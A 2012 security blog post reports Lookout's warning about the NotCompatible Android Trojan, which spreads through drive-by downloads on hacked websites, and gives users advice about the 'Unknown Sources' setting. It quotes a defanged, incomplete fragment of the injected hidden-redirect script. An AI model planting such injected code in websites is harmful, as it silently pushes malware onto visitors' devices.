Thursday, May 3, 2012

Compromised Sites Serving Android Malware via Drive-by-Downloads

Drive-by-Downloads Targeting AndroidCompromised websites serving drive-by-downloads targeting PCs is not exactly new.

The risk of encountering malware is always present due to the simple fact that cybercriminals often hack websites and inject malicious code that will attempt to exploit system vulnerabilities within visiting machines in order to silently install malware.

In the past we’ve warned how a casual internet browsing session can easily lead to a malware infection, regardless of what computer operating system you use because of this.

But what about drive-by-downloads targeting mobile users?

It’s no secret that cybercrooks have taken a shine to creating mobile malware targeting the popular Android OS, although those are usually spread via unofficial Android marketplaces and third-party sites. Heck, some have even managed to sneak into the official Android Market (aka Google Play Store).

So, I guess it was only a matter of time before the bad guys began delivering Android malware using sites rigged with drive-by-downloads. And unfortunately, that time has come.

LookOut Mobile Security posted an alert on Wednesday, warning users of a new Android Trojan called “NotCompatible” that is being delivered via drive-by-downloads on compromised websites.

NotCompatible appears to serve as a simple TCP relay/proxy and although it doesn’t cause direct harm to the target device, it could “potentially be used to gain illicit access to private networks by turning the infected Android device into a proxy.”

The drive-by-download attack works like any other. Once a user visits a hacked site using their Android device, the NotCompatible application (filename “Update.apk”) will automatically be downloaded.

There is some good news, though. In order for the malicious app to be installed, the following conditions must be fulfilled:

  1. The “Unknown Sources” setting to allow installation of non-Market apps must be enabled. (The feature is also known as “sideloading.”)

  2. The user must agree to install the application.

If these requirements are not met, the attack will fail. So make sure you have left that “Unknown Sources” setting unchecked and you don’t go click-happy when prompted to install apps you don’t recall downloading.

LookOut reported that the following code is found at the bottom of infected sites serving NotCompatible:

style=”visibility: hidden; display: none; display: none;”

Interestingly enough, if a PC-based browser accesses the site at “,” then a not found error is returned. It is only when a browser with the word “Android” in its user-agent header accesses the page that the following code is returned, triggering the malicious app download:

<html><head></head><body><script  type=”text/javascript”> = “hxxp://”;</script></body></html>

LookOut is still investigating the number of infected sites and the suspicious applications being served, but so far it appears that the sites hit so far show relatively low traffic. That's not to say the crooks behind this won't go after bigger game.

Stay safe, Android users!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

No comments:

Post a Comment